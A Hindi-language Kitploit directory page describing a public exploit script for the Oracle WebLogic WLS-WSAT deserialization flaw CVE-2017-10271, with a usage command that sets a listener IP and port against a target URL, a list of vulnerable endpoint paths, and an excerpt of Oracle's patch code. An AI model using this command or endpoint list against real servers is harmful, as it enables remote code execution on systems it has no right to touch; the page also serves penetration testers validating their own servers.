Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-10271 — Oracle WebLogic WLS-WSAT रिमोट कोड निष्पादन शोषण (CVE-2017-10271) | Kitploit
उपकरण/GitHubGitHub/kkirsche/cve-2017-10271
शोषण फ्रेमवर्कपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubkkirsche/cve-2017-10271

CVE-2017-10271

Oracle WebLogic WLS-WSAT रिमोट कोड निष्पादन शोषण (CVE-2017-10271)

रिपॉजिटरी देखें
129423 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-10271

वेबलॉजिक wls-wsat कंपोनेंट डिसीरियलाइज़ेशन भेद्यता (CVE-2017-10271) का पता लगाने और शोषण करने की स्क्रिप्ट

उपयोग

root@kitploit:~
$ python CVE-2017-10271.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/

विशेषताएँ

  • स्टैंडअलोन पायथन स्क्रिप्ट
    • जाँच कार्यक्षमता: देखें कि क्या कोई होस्ट असुरक्षित है
    • लिनक्स लक्ष्यों के लिए शोषण कार्यक्षमता
  • मेटास्प्लॉइट मॉड्यूल
    • जाँच कार्यक्षमता: देखें कि क्या कोई होस्ट असुरक्षित है
    • सभी लक्ष्यों के लिए शोषण कार्यक्षमता
  • स्कैनर (./scanners)
    • जाँचता है कि क्या होस्ट असुरक्षित है। पूरी तरह से स्वतंत्र

कानूनी सूचनाएँ

आप इस स्क्रिप्ट के उपयोग के लिए जिम्मेदार हैं। केविन किर्श (Kevin Kirsche) इस कोड का उपयोग करके किए गए किसी भी कार्य के लिए कोई जिम्मेदारी नहीं लेते। यह कोड उन टीमों के लिए बनाया गया था जो अपने सर्वरों की सुरक्षा को मान्य करना चाहते हैं, न कि दुर्भावनापूर्ण उपयोग के लिए।

धन्यवाद

Luffin को बहुत-बहुत धन्यवाद, जिन्होंने मूल POC बनाया जिस पर यह आधारित है https://github.com/Luffin/CVE-2017-10271

दिखाए गए URL के अलावा अन्य असुरक्षित URL:

root@kitploit:~
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/ParticipantPortType
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/RegistrationRequesterPortType11

संबंधित भेद्यता

CVE 2017-3506

Oracle का पैच

मूल स्रोत: https://blog.nsfocusglobal.com/threats/vulnerability-analysis/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

अद्यतन स्रोत: https://nsfocusglobal.com/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

root@kitploit:~
private void validate(InputStream is) {
 WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory();
 
 try {
  SAXParser parser = factory.newSAXParser();
  
  parser.parse(is, new DefaultHandler()) {
   private int overallarraylength = 0;
   
   public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXEception {
    if (qName.equalsIgnoreCase("object")) {
     throw new IllegalStateException("Invalid element qName:object");
    } else if (qName.equalsIgnoreCase("new")) {
     throw new IllegalStateException("Invalid element qName:new");
    } else if (qName.equalsIgnoreCase("method")) {
     throw new IllegalStateException("Invalid element qName:method");
    } else {
     if (qName.equalsIgnoreCase("void")) {
      for(int attClass = 0;attClass < attributes.getLength(); ++attClass) {
       if (!"index".equalsIgnoreCase(attributes.getQName(attClass))) {
        throw new IllegalStateException("Invalid attribute for element void: " + attributes.getQName(attClass));
       }
      }
     }
     
     ... more code here ...
    }
   }
  }
 }
}
टूल डाउनलोड करें